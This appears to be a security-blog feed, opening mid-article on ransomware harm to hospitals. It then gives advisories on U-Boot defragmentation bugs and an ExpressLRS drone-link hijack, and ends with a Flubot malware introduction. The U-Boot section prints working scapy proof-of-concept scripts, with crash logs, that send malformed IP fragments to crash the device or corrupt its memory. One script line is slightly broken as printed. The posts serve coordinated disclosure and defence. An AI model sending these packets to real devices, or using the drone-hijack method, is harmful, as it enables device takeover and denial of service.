An article published in Nature.com [24] analysed data from the WannaCry attack on the NHS. Interestingly, the research found “no significant effect demonstrated on mortality across all hospitals.”. However, the article also details “The NAO stated that there were no reports of patient harm from NHS organisations.1 This is difficult to quantify, and as discussed, mortality is a crude measure of patient harm. While the attack may not have led to a direct impact on mortality, we are unable to ascertain the true impact on complications, patient morbidity, or changes in care processes that resulted from the attack.” 

This is a key point as a negative outcome that does not lead to death can still have a significant impact on a patient’s life. For example, a delay in care that leads to paralysis, or organ failure that then requires the patient to have a transplant. Situations like this affect the patients’ quality of life as well as medical staff time and resources. 

Many respondents from a recent survey conducted by the Ponemon Institute [25] reported that a ransomware attack caused longer stays in hospital and delays that resulted in poor outcomes. 

The most convincing study [26] to date is one conducted by the Cybersecurity and Infrastructure Security Agency (CISA). This study was primarily concerned with the impact of COVID-19 on the Provide Medical Care National Critical Function in the US. The study was also able to gain insights into the impact that ransomware has on hospitals which found that “Although there are no deaths directly attributed to hospital cyberattacks, statistical analysis of an affected hospital’s relative performance indicates reduced capacity and worsened health outcomes”. 

What data is missing about the impact of ransomware attacks on patient health? 

What does all this mean? Currently we do not know enough about the effects that ransomware has on patient outcomes. Delays in care can cause negative outcomes, the average amount of downtime caused by ransomware reached 26 days according to Coveware [27]. It stands to reason then that a ransomware attack would incur negative outcomes as well. 

Furthermore, this is only considering the immediate downtime caused by the event. What about continued delays due to any backlogs that have occurred? Ransomware attacks, or any prolonged cyberattack or IT/OT outage, could result in long-term effects of a wide variety of medical conditions as well as the psychological effect on patients including a lack of trust whereby patients do not disclose information that might be key to diagnosis. Not to mention the effect that the resultant fatigue can have on medical staff [28]. 

The Department of Health and Social Care (DHSC) in the UK recently outlined the new cyber security strategy for health and social care, this included “calling for input from around the sector to improve the understanding of how cyber relates to patient outcomes and identify the important elements.” [29]. 

Attack vectors and targeted systems

Few details exist on root cause of successful attacks and depending on what resource you find the order of common attack vectors differ. A quarterly report from Coveware [27] lists the top 3 ransomware attack vectors across all industries over the past 3 years as RDP, email phishing, software vulnerability. Whilst the most common attack vendor according to respondents from the Ponemon study [25] was through cloud applications. Analysis in 2020 conducted by researchers at Tenable found a key method for gaining access to hospital networks was through a pair of Citrix vulnerabilities [30].  

Electronic Patient/Health/Medical Records (EPR, EHR, EMR) are also prime targets for attackers. Medical records contain a lot of valuable data so this can be used for several fraudulent reasons, especially in countries where healthcare is not paid for by the state. Preventing access to these systems will disrupt the delivery of care. Vital information becomes unavailable to help treat patients and therefore exerts overwhelming pressure on healthcare organisations to pay the ransom. 

The attack on the Health Service Executive (HSE), Ireland’s public health service, prevented access to all the IT systems and took four months to decrypt all the servers [31]. This meant access to patient records and scans were not available for extended periods of time. 

Downtime in laboratory’s also cause significant issues as Laboratory Information Systems (LIS) and clinical labs are very reliant on interconnectivity between systems [32]. Delays in ordering tests and receiving results can have an impact on clinical decision making. 

How to better understand the impact of ransomware events? 

Given the complexity of the healthcare industry it would be beneficial to understand not just the immediate impact of ransomware attacks but also the medium and long-term effects as well. Knowing what could happen in the first few hours, 5 years, and key points in between would help develop preventative actions. It would also help prepare for potential consequences and care requirements in the event of a successful attack. 

Metrics could include: 

  • The effects on individual and/or groups of illnesses 
  • The short/medium/long-term resources required to facilitate the effects on patients 
  • A breakdown of what systems and departments are affected 
  • The percentage of movement in clinical risk – for example, how many low-risk cases escalate to medium-risk due to a delay in care 
  • Number of cases referred to neighbouring facilities 

A more in-depth retrospective analysis of the WannaCry attack on the NHS as well as ongoing analysis of the HSE attack would be extremely useful in shaping how healthcare organisations prepare for, respond to, and recover from ransomware attacks. 

What do we need to know to be able to address this problem? 

Being able to analyse current or previous events more thoroughly is one way to understand the true impact that ransomware attacks have on healthcare organisations. However, data gathered from a previous or current attack may not be accurate or complete as a result of the incresae in stress and load on staff and resources. 

Another option could be to use simulations and AI/ML to predict how ransomware attacks affect patient outcomes. A recent paper [33] detailing the results from adapting an established simulation model, used for evaluating operational strategies [34], to assess the resilience of hospitals to cyberattacks. In conjunction with a simulation of this type it might be possible to apply AI/ML to predict specific medical issues [35] [36] [37] [38] or patient outcomes in general [39]. 

Imagine a healthcare organisation being able to understand with some confidence what the impact would be on any or all their patients, based on what systems were down, for how long those systems were down and if services were available at a neighbouring facility. 

It is important to understand what the real impact is, prolonged cyberattacks have the potential to have a significant effect but are unlike other disaster situations. Power outages can be protected against by using backup generators that will kick in quickly, weather patterns can, to a certain extent, be predicted and planned for. Ransomware can strike at any moment, take out an unpredictable number of systems, affect multiple organisations simultaneously over large geographic distances, and recur at the whim of attackers if remediation efforts are insufficient or non-existent. More importantly, ransomware can be, to an extent, prevented by following security best practices such as hardening systems and devices, properly segregating networks, installing security patches and updates.

From a financial perspective the ability for a healthcare organisation to get back to a functioning state and implement remediation objectives could be hampered by additional strain from lawsuits. A worrying statistic, reported by Healthcare Finance News [40], shows an increase in lawsuits filed against healthcare organisations over data breaches. 

As such disaster recovery plans should include recovery from ransomware attacks as part of the strategy, arguably as a priority. The HSE report [31] and simulation research [33] note, respectively, the absence of preparation for relevant scenarios, “In addition, as is the case with many other organisations, the scenario of sustained loss of IT across the entire health service has not been planned for, with specific considerations and playbooks,” and no consideration for a cyberattack as a hazardous event, “while the impact of a wide variety of hazard event types on hospital capability and capacity were studied, cyberattack was not previously considered in these models.” 

Cyberattacks targeting the healthcare sector, as with any other industry, do not have borders so international collaboration around research & information-sharing is important. If we have more diverse input about impact on different communities, populations, economies, and geographic areas we can build better solutions to the problem. Therefore helping to ease the burden on healthcare professionals, resources and contribute to preventing poor patient outcomes.

Next steps

It would be beneficial to expand on previous research and take a deep dive into hospital data from just prior and up to today from the WannaCry attack. Concentrating on a small but varied number of health issues that have the potential to demonstrate if and how delays in care caused by ransomware affect patient morbidity. Using examples of hospitals that were able to transfer patients to neighbouring facilities as well as hospitals that were not able to is important to understand the immediate and the cascading effects.

This would hopefully lay the foundations for creating configurable ransomware simulations for a more proactive approach to help prevent attacks but also to better understand where clinical resources should be prioritised.

References 

[1] https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2017 

[2] https://www.enisa.europa.eu/publications/enisa-threat-landscape-report-2018 

[3] https://www.enisa.europa.eu/publications/ransomware 

[4] https://www.enisa.europa.eu/publications/enisa-threat-landscape-2021 

[5] https://www.ic3.gov/Media/PDF/AnnualReport/2017_IC3Report.pdf 

[6] https://www.ic3.gov/Media/PDF/AnnualReport/2018_IC3Report.pdf 

[7] https://www.ic3.gov/Media/PDF/AnnualReport/2019_IC3Report.pdf 

[8] https://www.ic3.gov/Media/PDF/AnnualReport/2020_IC3Report.pdf 

[9] https://www.ic3.gov/Media/PDF/AnnualReport/2021_IC3Report.pdf 

[10] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/609186/Cyber_Security_Breaches_Survey_2017_main_report_PUBLIC.pdf 

[11] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/702074/Cyber_Security_Breaches_Survey_2018_-_Main_Report.pdf 

[12] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/950063/Cyber_Security_Breaches_Survey_2019_-_Main_Report_-_revised_V2.pdf 

[13] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/893399/Cyber_Security_Breaches_Survey_2020_Statistical_Release_180620.pdf 

[14] https://assets.publishing.service.gov.uk/government/uploads/system/uploads/attachment_data/file/972399/Cyber_Security_Breaches_Survey_2021_Statistical_Release.pdf 

[15] https://assets.sophos.com/X24WTUEQ/at/s49k3zrbsj8x9hwbm9nkhzxh/sophos-state-of-ransomware-in-healthcare-2021-wp.pdf 

[16] https://news.sophos.com/en-us/2022/06/01/the-state-of-ransomware-in-healthcare-2022/

[17] https://www.wired.co.uk/article/ransomware-hospital-death-germany 

[18] https://www.documentcloud.org/documents/21072978-kidd-amended-complaint 

[19] https://www.medpagetoday.com/meetingcoverage/acep/95357 

[20] https://www.researchgate.net/publication/355630183_162_Regional_Emergency_Department_Census_Impacts_During_a_Cyber_Attack 

[21] https://www.nejm.org/doi/full/10.1056/NEJMsa1614073 

[22] https://arxiv.org/pdf/1904.02058.pdf 

[23] https://cyberpeaceinstitute.org/report/2021-03-CyberPeaceInstitute-SAR001-Healthcare.pdf 

[24] https://www.nature.com/articles/s41746-019-0161-6 

[25] https://www.censinet.com/ponemon-report-covid-impact-ransomware 

[26] https://www.cisa.gov/sites/default/files/publications/CISA_Insight_Provide_Medical_Care_Sep2021.pdf 

[27] https://www.coveware.com/blog/2022/5/3/ransomware-threat-actors-pivot-from-big-game-to-big-shame-hunting 

[28] https://www.theguardian.com/society/2022/jun/04/sleep-deprived-medical-staff-pose-same-danger-on-roads-as-drunk-drivers 

[29] https://www.ukauthority.com/articles/five-pillars-in-cyber-strategy-for-health-and-social-care/ 

[30] https://www.zdnet.com/article/ransomware-attacks-now-to-blame-for-half-of-healthcare-data-breaches/ 

[31] https://www.hse.ie/eng/services/publications/conti-cyber-attack-on-the-hse-full-report.pdf 

[32] https://academic.oup.com/ajcp/article/157/4/482/6533636 

[33] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC8638073/ 

[34] https://www.tandfonline.com/doi/abs/10.1080/24725579.2019.1584132 

[35] https://www.insideprecisionmedicine.com/artificial-intelligence/ai-used-to-calculate-individual-risk-of-repeat-stroke/ 

[36] https://www.scientificamerican.com/article/ai-can-predict-kidney-failure-days-in-advance/ 

[37] https://www.nbcnews.com/mach/science/ai-predicts-heart-attacks-better-doctors-n752011 

[38] https://www.futuremedicine.com/doi/full/10.2217/fon-2021-0302 

[39] https://www.nature.com/articles/s41746-018-0029-1 

[40] https://www.healthcarefinancenews.com/news/patients-increasingly-suing-hospitals-over-data-breaches 

Updated: Technical Advisory and Proofs of Concept – Multiple Vulnerabilities in U-Boot (CVE-2022-30790, CVE-2022-30552)

16 June 2022 at 21:15

By Nicolas Bidron, and Nicolas Guigo.

[Editor’s note: This is an updated/expanded version of these advisories which we originally published on June 3 2022.]

U-boot is a popular boot loader for embedded systems with implementations for a large number of architectures and prominent in most linux based embedded systems such as ChromeOS and Android Devices.

Two vulnerabilities were uncovered in the IP Defragmentation algorithm implemented in U-Boot, with links to the associated technical advisories below:

Exploitation proof of concepts and results are provided in each technical advisories below.

Technical Advisories:

Hole Descriptor Overwrite in U-Boot IP Packet Defragmentation Leads to Arbitrary Out of Bounds Write Primitive (CVE-2022-30790)

Project U-Boot
Project URL https://source.denx.de/u-boot/u-boot
Versions affected all versions up to commit b85d130ea0cac152c21ec38ac9417b31d41b5552
Systems affected All systems defining CONFIG_IP_DEFRAG
CVE identifier CVE-2022-30790
Advisory URL link
Risk Critical 9.6 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Authors Nicolas Guigo, Nicolas Bidron

Summary

U-boot is a popular boot loader for embedded systems with implementations for a large number of architectures and prominent in most linux based embedded systems.

Location

In u-boot/net/net.c the __net_defragment function line 900 through 1018.

Impact

The U-Boot implementation of RFC815 IP DATAGRAM REASSEMBLY ALGORITHMS is susceptible to a Hole Descriptor overwrite attack which ultimately leads to an arbitrary write primitve.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (IP packet header’s total Length) higher than IP_HDR_SIZE and strictly lower than IP_HDR_SIZE+8 leads to a value for len comprised between 0 and 7. This ultimately results in a truncated division by 8 resulting in a value of 0, forcing the hole metadata and fragment to point to the same location. The subsequent memcpy then overwrites the hole metadata with the fragment data. Through a second fragment, this attacker-controlled metadata can be exploited to perform a controlled write to an arbitrary offset.

This bug is only exploitable from the local network as it requires crafting a malformed packet which would most likely be dropped during routing. However, this it can be effectively leveraged to root linux based embedded devices locally.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows how the attacker can control the value of len to be strictly lower than 8 by issuing a packet with ip_len between 21 and 27 (IP_HDR_SIZE has a value of 20).

Also note that offset8 here is 0 which leads to thisfrag = payload.

	} else if (h >= thisfrag) {
		/* overlaps with initial part of the hole: move this hole */
		newh = thisfrag + (len / 8);
		*newh = *h;
		h = newh;
		if (h->next_hole)
			payload[h->next_hole].prev_hole = (h - payload);
		if (h->prev_hole)
			payload[h->prev_hole].next_hole = (h - payload);
		else
			first_hole = (h - payload);

	} else {

Later in the same function, execution reaches the above code path. Here, len / 8 evaluates to 0 leading to newh = thisfrag. Also note that first_hole here is 0 since h and payload point to the same location.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt the call to memcpy() overwrites the hole metadata (since thisfrag and h both point to the same location) with arbitrary data from the fragmented IP packet data. With a len value of 6, last_byte, next_hole, and prev_hole of the first_hole all end- up attacker-controlled.

Finally the arbitrary write is triggered by sending a second fragment packet, whose offset and length only need to fit within the hole pointed to by the previously controlled metadata (next_hole) set from the first packet.

Recommendation

This bug was fixed in commit b85d130ea0cac152c21ec38ac9417b31d41b5552 on U-Boot master’s branch. Update to the latest version to obtain the fix.

Proof of Concept for exploitation and Results

Exploitation was attempted against a build of U-Boot for Raspberry Pi 4 with IP_DEFRAG enabled. The device was set to attempt loading kernel through U-Boot’s dhcp method, this ensures that the devices gets an IP address and enables its ethernet interface, allowing the malicious payload to be delivered by an adjacent machine on the network (connected to the same switch).

The following Python script was used to send the first malicious packet that will overwrite the initial __net_defragment() hole metadata with contents from a own specially crafted hole structure. The second packet effectively executed the memory overwrite at the offset set up by the first packet’s next_hole, which led to a crash but the payload can be adjusted to achieve controlled memory writes against the target.

import ctypes
from sys import argv
from scapy.all import *

# struct endianness based on arch
class hole(ctypes.LittleEndianStructure):
  _pack_ = 1
  _fields_ = [('last_byte', ctypes.c_ushort),
              ('next_hole', ctypes.c_ushort),
              ('prev_hole', ctypes.c_ushort),
              ('unused', ctypes.c_ushort)]
  def __init__(self, lb, nh, ph):
    return super().__init__(lb, nh, ph, 0xFEFE)

# U-Boot IP Fragment Hole Overwrite
def frag_hole_overwrite():
  # Prepare the malicious hole
  hh = hole(0x10, 0x07FD, 0xFFFF)
  payload = bytes(hh) + bytes(0x20)
  packet1 = Ether(dst=mac)/IP(dst=ip, flags='MF', frag=0x0, len=27)/Raw(payload)
  packet1.show2()
  sendp(packet1, iface='virbr0')
  # Trigger the unsafe write in the overlap case
  payload = bytes(0x10)
  packet2 = Ether(dst=mac)/IP(dst=ip, flags='MF', frag=0x0)/Raw(payload)
  packet2.show2()
  sendp(packet2, iface='eth0') iface=virbr0 if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_hole_overwrite()

The above script can be launched with the following command:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

This will result in the following (log as shown on U-Boot’s console):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Environment from FAT... Unable to read "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Net:   eth0: [email protected]
PCIe BRCM: link up, 5.0 Gbps x1 (SSC)
starting USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Starting the controller
USB XHCI 1.00
scanning bus xhci_pci for devices... 2 USB Device(s) found
       scanning usb for storage devices... 0 Storage Device(s) found
Hit any key to stop autoboot:  0 
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
Found U-Boot script /boot.scr
146 bytes read in 9 ms (15.6 KiB/s)
## Executing script at 02400000
[email protected] Waiting for PHY auto negotiation to complete. done
BOOTP broadcast 1
DHCP client bound to address 192.168.0.90 (23 ms)
*** Warning: no boot file name; using 'C0A8005A.img'
Using [email protected] device
TFTP from server 192.168.0.1; our IP address is 192.168.0.90
Filename 'C0A8005A.img'.
Load address: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x8a000000
elr: fffffffff8165fff lr : 00000000000e43a8 (reloc)
elr: 000000000000ffff lr : 0000000007f8e3a8
x0 : 0000000007b9b942 x1 : 000000000000007a
x2 : 0000000000000040 x3 : 000000000000ffff
x4 : 00000000000001ad x5 : 0000000007b2f000
x6 : 0000000000000024 x7 : 0000000000000000
x8 : 000000000000000b x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000000000006
x12: 000000000001869f x13: 0000000007b168cc
x14: 0000000007b18b00 x15: 0000000000000002
x16: 000000000000ffff x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 000000000000007a
x20: 0000000007b2f130 x21: 0000000000000020
x22: 0000000007fcf000 x23: 0000000007fc9000
x24: 0000000007fcb000 x25: 0000000007fc9000
x26: 0000000007fc9628 x27: 0000000007fcf000
x28: 0000000007fcf000 x29: 0000000007b16b40

Code: 4bcbc7cb 46890822 c96a480a b2353b57 (3e972802) 
Resetting CPU ...

resetting ...

Large buffer overflow leads to DoS in U-Boot IP Packet Defragmentation Code (CVE-2022-30552)

Project U-Boot
Project URL https://source.denx.de/u-boot/u-boot
Versions affected all versions up to commit b85d130ea0cac152c21ec38ac9417b31d41b5552
Systems affected All systems defining CONFIG_IP_DEFRAG
CVE identifier CVE-2022-30552
Advisory URL link
Risk High 7.1 (CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H)
Authors Nicolas Guigo, Nicolas Bidron

Summary

U-boot is a popular boot loader for embedded systems with implementations for a large number of architectures and prominent in most linux based embedded systems.

Location

u-boot/net/net.c lines 915 and 1011.

Impact

The U-Boot implementation of RFC815 IP DATAGRAM REASSEMBLY ALGORITHMS is susceptible to a buffer overflow through a specially crafted fragmented IP Datagram with an invalid total length which causes a denial of service.

Description

In compiled versions of U-Boot that define CONFIG_IP_DEFRAG, a value of ip->ip_len (IP packet header’s total length) lower than IP_HDR_SIZE leads to len taking a negative value, which ultimately results in a buffer overflow during the subsequent call to memcpy() that uses len as its count parameter.

This bug is only exploitable from the local network as it requires crafting a malformed packet with an ip_len value lower than the minimum accepted total length (21 as defined in the IP specification document: RFC791) which would most likely be dropped during routing.

static struct ip_udp_hdr *__net_defragment(struct ip_udp_hdr *ip, int *lenp)
{
	static uchar pkt_buff[IP_PKTSIZE] __aligned(PKTALIGN);
	static u16 first_hole, total_len;
	struct hole *payload, *thisfrag, *h, *newh;
	struct ip_udp_hdr *localip = (struct ip_udp_hdr *)pkt_buff;
	uchar *indata = (uchar *)ip;
	int offset8, start, len, done = 0;
	u16 ip_off = ntohs(ip->ip_off);

	/* payload starts after IP header, this fragment is in there */
	payload = (struct hole *)(pkt_buff + IP_HDR_SIZE);
	offset8 =  (ip_off & IP_OFFS);
	thisfrag = payload + offset8;
	start = offset8 * 8;
	len = ntohs(ip->ip_len) - IP_HDR_SIZE;

The last line of the previous excerpt from u-boot/net/net.c shows where the underflow to a negative len value occurs if ip_len is set to a value strictly lower than 20 (IP_HDR_SIZE being 20). Also note that in the above excerpt the pkt_buff buffer has a size of CONFIG_NET_MAXDEFRAG which defaults to 16 KB but can range from 1KB to 64 KB depending on configurations.

	/* finally copy this fragment and possibly return whole packet */
	memcpy((uchar *)thisfrag, indata + IP_HDR_SIZE, len);

In the above excerpt the memcpy() overflows the destination by attempting to make a copy of nearly 4 gigabytes in a buffer that’s designed to hold CONFIG_NET_MAXDEFRAG bytes at most, which leads to a DoS.

Recommendation

This bug was fixed in commit b85d130ea0cac152c21ec38ac9417b31d41b5552 on U-Boot master’s branch. Update to the latest version to obtain the fix.

Proof of Concept for exploitation and Results

Exploitation was attempted against a build of U-Boot for Raspberry Pi 4 with IP_DEFRAG enabled. The device was set to attempt loading kernel through U-Boot’s dhcp method, this ensures that the devices gets an IP address and enables its ethernet interface, allowing the malicious payload to be delivered by an adjacent machine on the network (connected to the same switch).

The following Python script is used to send the single malicious packet that will underflow len, ultimately overflowing the buffer (thisfrag) and crashing the device.

import ctypes
from sys import argv
from scapy.all import *

# U-Boot Fragment Underflow
def frag_underflow():
  packet = Ether(dst=mac)/IP(dst=ip, flags='MF', frag=0x0, len=19)/UDP()
  packet.show2()
  sendp(packet, iface='eth0') # iface=virbr0 if launched against a qemu instance

if __name__ == '__main__':
  global mac, ip
  mac = argv[1]
  ip = argv[2]
  frag_underflow()

The above script can be launched with the following command:

> ./fragger_poc.py dc:a6:32:ef:5f:0a 192.168.0.90

This will result in the following (log as shown on U-Boot’s console):

U-Boot 2022.04-dirty (May 26 2022 - 00:53:40 -0700)

DRAM:  7.1 GiB
RPI 4 Model B (0xd03114)
Core:  202 devices, 13 uclasses, devicetree: board
MMC:   [email protected]: 1, [email protected]: 0
Loading Environment from FAT... Unable to read "uboot.env" from mmc0:1... 
In:    serial
Out:   vidconsole
Err:   vidconsole
Net:   eth0: [email protected]
PCIe BRCM: link up, 5.0 Gbps x1 (SSC)
starting USB...
Bus xhci_pci: Register 5000420 NbrPorts 5
Starting the controller
USB XHCI 1.00
scanning bus xhci_pci for devices... 2 USB Device(s) found
       scanning usb for storage devices... 0 Storage Device(s) found
Hit any key to stop autoboot:  0 
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
Found U-Boot script /boot.scr
146 bytes read in 9 ms (15.6 KiB/s)
## Executing script at 02400000
BOOTP broadcast 1
DHCP client bound to address 192.168.0.90 (18 ms)
*** Warning: no boot file name; using 'C0A8005A.img'
Using [email protected] device
TFTP from server 192.168.0.1; our IP address is 192.168.0.90
Filename 'C0A8005A.img'.
Load address: 0x1000000
Loading: T T T T T T T T T T 
Retry count exceeded; starting again
SCRIPT FAILED: continuing...
libfdt fdt_check_header(): FDT_ERR_BADMAGIC
MMC Device 2 not found
no mmc device at slot 2

Device 0: unknown device
BOOTP broadcast 1
DHCP client bound to address 192.168.0.90 (21 ms)
*** Warning: no boot file name; using 'C0A8005A.img'
Using [email protected] device
TFTP from server 192.168.0.1; our IP address is 192.168.0.90
Filename 'C0A8005A.img'.
Load address: 0x1000000
Loading: T T T T T T T T "Synchronous Abort" handler, esr 0x96000046
elr: 00000000000e06e8 lr : 00000000000e5174 (reloc)
elr: 0000000007f8a6e8 lr : 0000000007f8f174
x0 : 0000000007fcb51c x1 : 0000000007b75964
x2 : ffffffffffffffff x3 : 0000000000234ae4
x4 : 0000000007fcb51c x5 : 0000000000000000
x6 : 0000000000000000 x7 : 00000000ffffffff
x8 : 0000000000000000 x9 : 0000000000000008
x10: 00000000ffffffe0 x11: 0000000007fcb514
x12: 000000000001869f x13: 0000000007b17d4c
x14: 0000000007b18b00 x15: 0000000000000002
x16: 0000000007f5cc84 x17: 2e8324b208000000
x18: 0000000007b25d60 x19: 0000000007b75942
x20: 0000000007fcb500 x21: 0000000007fa0fd0
x22: 0000000007f98156 x23: 00000000ffffffff
x24: 0000000007fc9000 x25: 0000000000000000
x26: 0000000007fcb514 x27: 0000000007fcb51c
x28: 0000000007b75950 x29: 0000000007b17f30

Code: cb030004 cb030021 17fffff0 38636825 (38236885) 
Resetting CPU ...

resetting ...

Disclosure Timeline

May 18th 2022: Initial e-mail from NCC to U-boot maintainers announcing two vulnerabilities were identified. U-Boot maintainers responded indicating that the disclosure process is to be handled publicly through U-Boot’s mailing list.

May 18th 2022: NCC posted a full writeup of the two vulnerabilities identified to U-Boot’s public mailing list.

May 25th 2022: a U-Boot maintainer indicated on the mailing list that they will implement a fix to the two findings.

May 26th 2022: a patch has been proposed by U-Boot maintainers to fix both CVEs through the mailing list.

May 31st 2022: U-boot maintainers and NCC Group agree to publishing the advisories in advance of patch deployment, given the public mailing-list-based discussion of the vulnerability and proposed fixes.

June 3rd 2022: Fix is commited to U-Boot master branch https://source.denx.de/u-boot/u-boot/-/commit/b85d130ea0cac152c21ec38ac9417b31d41b5552

Thanks to

Jennifer Fernick, and Dave Goldsmith for their support through the disclosure process.

U-Boot’s maintainers.

Authors

Nicolas Guigo, and Nicolas Bidron

Technical Advisory – ExpressLRS vulnerabilities allow for hijack of control link

30 June 2022 at 18:15
 Vendor: ExpressLRS
 Vendor URL: https://expresslrs.org
 Versions affected: 1.x, 2.x
 Author: Richard Appleby
 Severity: Medium 7.5 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

ExpressLRS is a high-performance open source radio control link. It aims to provide a low latency radio control link while also achieving maximum range. It runs on a wide variety of hardware in both 900 Mhz and 2.4 GHz frequencies. ExpressLRS is very popular in FPV drone racing and other remote control aircraft.

Using only a standard ExpressLRS compatible transmitter, it is possible to take control of any receiver after observing traffic from a corresponding transmitter.

ExpressLRS uses a ‘binding phrase’, built into the firmware at compile time to bind a transmitter to a receiver. ExpressLRS states that the binding phrase is not for security, it is anti-collision.

Due to weaknesses related to the binding phase, it is possible to extract part of the identifier shared between the receiver and transmitter. A combination of analysis and brute force can be utilised to determine the remaining portion of the identifier. Once the full identifier is discovered, it is then possible to use an attacker’s transmitter to control the craft containing the receiver with no knowledge of the binding phrase. This is possible entirely in software using standard ExpressLRS compatible hardware.

Impact

This attack could result in full control over the target craft. An aircraft already in the air would likely experience control issues causing a crash.

Details

The binding phrase is passed through the MD5 cryptographic hash algorithm to obtain a unique byte sequence. Of this sequence, the first 6 bytes are stored as a shared UID between the receiver and the transmitter. The last four bytes of the UID are used as a seed to generate a random frequency hopping spread spectrum (FHSS) sequence. Both the transmitter and receiver hop between frequencies in the FHSS sequence in sync.

A ‘sync’ packet is sent from the transmitter to the receiver to at the start of a connection and at regular intervals through the FHSS sequence. CRC checks, initialised using the last two bytes of the UID are used to ensure that packets has been received intact.

The following diagram indicates the relationship between these elements.

Three weaknesses were identified, which allow for the discovery of the four bytes of the required UID to take control of the link.

Two of these issues relate to the contents of the sync packet.

  1. The sync packet contains the final three bytes of the UID. These bytes are used to verify that the transmitter has the same binding phrase as the receiver, to avoid collision. Observation of a single sync packet therefor gives 75% of the bytes required to take over the link.
  2. The CRC initialiser uses the final two bytes of the UID sent with the sync packet, making it extremely easy to create a CRC check.

The combination of these two issues means that only one byte is unknown from the UID used to generate the FHSS sequence. To find the last byte, all possible byte values were used to create 256 different possible FHSS sequences. The third weakness occurs in the FHSS sequence generation.

  1. Due to weaknesses in the random number generator, the second 128 values of the final byte of the 4 byte seed produce the same FHSS sequence as the first 128.

By choosing a frequency from the FHSS sequence, and observing the timings relative to a received sync packet, it is possible to determine which entries in the brute forced 128 FHSS sequences correlate with the final byte of the UID.

Once the final UID byte is discovered, the UID can be set in the transmitter and it will connect with the receiver.

It is acknowledged that the FHSS sequence can also be discovered by observing packets over the air without brute forcing the sequences, but that this can be more time consuming and error prone.

Recommendations

The security of the ExpressLRS can be improved with the following changes.

  1. Do not send the UID over the control link. The data used to generate the FHSS sequence should not be sent over the air.
  2. Improve the random number generator. This could involve using a more secure algorithm, or adjusting the existing algorithm to work around repeated sequences.

Disclosure Timeline

  • December 1, 2021: Initial contact with ExpressLRS Github repository owner
  • February 3, 2022: Technical advisory draft sent to repository owner
  • February 8, 2022: Github pull request for patch submitted to repository: https://github.com/ExpressLRS/ExpressLRS/pull/1411
  • February 9/10, 2022: Discussions regarding size of pull request and effectiveness between ExpressLRS developer and NCC Group
  • March 4, 2022: Github pull request submitted to ExpressLRS which addressed size issues
  • March 5, 2022: Pull request rejected by ExpressLRS maintainer; differing opinions between NCC and developers
  • June 30 2022: Advisory published

Flubot: the evolution of a notorious Android Banking Malware

5 July 2022 at 19:58

Originally published June 29, 2022 on the Fox-IT blog

Authored by Alberto Segura (main author) and Rolf Govers (co-author)

Summary

Flubot is an Android based malware that has been distributed in the past 1.5 years in
Europe, Asia and Oceania affecting thousands of devices of mostly unsuspecting victims.
Like the majority of Android banking malware, Flubot abuses Accessibility Permissions and Services in order to steal the victim’s credentials, by detecting when the official banking application is open to show a fake web injection, a phishing website similar to the login form of the banking application. An important part of the popularity of Flubot is due to the distribution strategy used in its campaigns, since it has been using the infected devices to send text messages, luring new victims into installing the malware from a fake website. In this article we detail its development over time and recent developments regarding its disappearance, including new features and distribution campaigns.

Introduction

One of the most popular active Android banking malware families today. An “inspiration” for developers of other Android banking malware families. Of course we are talking about Flubot. Never heard of it? Let us give you a quick summary.

Flubot banking malware families are in the wild since at least the period between late 2020 and the first quarter of 2022. Most of its popularity comes from its distribution method: smishing. Threat Actors (TA) have been using the infected devices to send text messages to other phone numbers, stolen from other infected devices and stored in Command-and-Control servers (C2).

In the initial campaigns, TAs used fake Fedex, DHL and Correos – a local Spanish parcel shipping company – SMS messages. Those SMS messages were fake notifications which lured the user into a fake website in order to download a mobile application to track the shipping. These campaigns were very successful, since nowadays most people are used to buy different kinds of products online and receive that type of messages to track the shipping of the product. Flubot is not only a very active family: TAs have been very actively introducing new features, support for campaigns in new countries and improving the features it already had.

On June 1, 2022, Europol announced the takedown of Flubot in a joint operation including 11 countries. The Dutch Police played a key part in this operation and successfully disrupted the infrastructure in May 2022, rendering this strain of malware inactive. That was interesting period of time to look back at the early days of Flubot, how it evolved and became so notorious.

